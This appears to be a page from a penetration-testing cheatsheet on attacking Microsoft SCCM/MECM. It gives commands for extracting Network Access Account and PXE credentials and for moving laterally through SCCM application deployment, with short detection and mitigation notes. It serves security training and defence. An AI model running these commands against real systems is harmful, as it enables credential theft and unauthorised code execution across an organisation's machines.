daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-75-sccm-mecm-exploitation.md (3408B)


      1 ---
      2 title: "Attack #75 β€” SCCM MECM Exploitation"
      3 description: "Microsoft Endpoint Configuration Manager (MECM/SCCM) manages software deployment, patching, and configuration across enterprise environments. SCCM servers…"
      4 category: active-directory
      5 subcategory: "Advanced & Post-Exploitation"
      6 tags: ["active-directory", "lateral-movement"]
      7 tools: ["PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/πŸ”· Attack #75 β€” SCCM MECM Exploitation.md"
     11 ---
     12 # πŸ”· Attack #75 β€” SCCM / MECM Exploitation
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Microsoft Endpoint Configuration Manager (MECM/SCCM) manages software deployment, patching, and configuration across enterprise environments. SCCM servers store **Network Access Account (NAA)** credentials, client push installation credentials, and task sequence passwords β€” all recoverable by an attacker. Additionally, SCCM can be abused for **lateral movement** via application deployment and client push.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **SCCM client installed on compromised host** | Or local admin on SCCM server |
     27 | **Network access to SCCM infrastructure** | For credential extraction |
     28 
     29 ***
     30 
     31 ## πŸ’» Full Commands
     32 
     33 ```powershell
     34 # ── SharpSCCM β€” Enumerate SCCM ───────────────────────────────────────────────
     35 .\SharpSCCM.exe local site-info
     36 .\SharpSCCM.exe get site-info -mp SCCM01.corp.local
     37 
     38 # ── Extract NAA credentials (from SCCM client) ───────────────────────────────
     39 .\SharpSCCM.exe local naa -m wmi
     40 # Or:
     41 .\SharpDPAPI.exe sccm
     42 
     43 # ── Extract credentials from SCCM database (if DB access) ────────────────────
     44 .\SharpSCCM.exe get naa -mp SCCM01.corp.local -sc COR
     45 
     46 # ── Lateral movement via SCCM application deployment ─────────────────────────
     47 .\SharpSCCM.exe exec -p calc.exe -mp SCCM01 -sc COR -r TARGET
     48 # Deploys and executes on target machine via SCCM
     49 ```
     50 
     51 ```bash
     52 # ── sccmhunter (Linux) ────────────────────────────────────────────────────────
     53 python3 sccmhunter.py find -u low_user -p 'Password1' -d corp.local -dc-ip 10.10.10.10
     54 python3 sccmhunter.py show -u low_user -p 'Password1' -d corp.local
     55 
     56 # ── pxethief β€” PXE boot media credential extraction ──────────────────────────
     57 python3 pxethief.py 2 SCCM01.corp.local
     58 ```
     59 
     60 ***
     61 
     62 ## πŸ›‘οΈ Detection β€” Event IDs
     63 
     64 | Event ID | Source | What to Look For |
     65 |---|---|---|
     66 | **Application deployment** | SCCM logs | Unexpected application deployments |
     67 | **4624** | Security Log | NAA account logon from unexpected source |
     68 
     69 ***
     70 
     71 ## πŸ”— Attack Chain Context
     72 
     73 ```
     74 [SCCM/MECM] ──→ Extract creds / deploy payloads across the domain
     75          β”‚
     76          β”œβ”€β”€β†’ πŸ”‘ NAA credentials often have elevated network access
     77          β”œβ”€β”€β†’ πŸ’» Task sequence passwords β†’ local admin on deployed machines
     78          └──→ πŸ’€ Defeated by: use Enhanced HTTP, remove NAA, restrict admin roles
     79 ```
     80 
     81 ***
     82 
     83 > βœ… **Attack #75 β€” SCCM/MECM Exploitation complete.**